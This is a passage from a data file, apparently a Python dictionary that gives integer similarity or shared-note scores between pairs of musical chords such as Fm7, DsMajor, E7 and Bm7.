'AsDim': 2,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 3,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 3,
'DsMinor': 0,
},
'Fm7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 4,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 3,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'DsMajor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 3,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'E7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 3,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 4,
'C7': 1,
'GsMinor': 2,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 2,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'C7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 3,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 3,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 4,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 2,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 3,
'DsMinor': 1,
},
'GsMinor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 3,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 0,
'GsMinor': 3,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 1,
},
'Bm7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 3,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 3,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 4,
'G7': 2,
'Asm7': 0,
'BMajor': 2,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 3,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'G7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 2,
'G7': 4,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 3,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'Asm7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 4,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 2,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 1,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 0,
'Csm7': 2,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 1,
},
'BMajor': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 0,
'GsMinor': 2,
'Bm7': 2,
'G7': 1,
'Asm7': 0,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 2,
},
'Ds7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 3,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 4,
'GsMaj7': 2,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 3,
'GMinor': 2,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 2,
},
'GsMaj7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 2,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 3,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 2,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 4,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'AsMinor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 2,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 3,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 1,
},
'BDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 0,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 3,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'AsMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'AMaj7': {
'AMinor': 2,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 3,
'A7': 3,
'Fm7': 1,
'DsMajor': 0,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 4,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 3,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 3,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'DMajor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 3,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'AsDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 2,
'B7': 0,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 0,
'Asm7': 2,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 3,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'Fsm7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 3,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 2,
'AMajor': 3,
'A7': 3,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 2,
'AsDim': 2,
'Fsm7': 4,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 2,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 2,
'FsMajor': 2,
'Am7': 2,
'DsMinor': 1,
},
'Cs7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 3,
'FDim': 3,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 2,
'Bm7': 1,
'G7': 2,
'Asm7': 3,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 4,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 2,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 3,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 0,
},
'Gm7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 3,
'Asm7': 2,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 4,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 3,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'DDim': {
'AMinor': 0,
'CDim': 0,
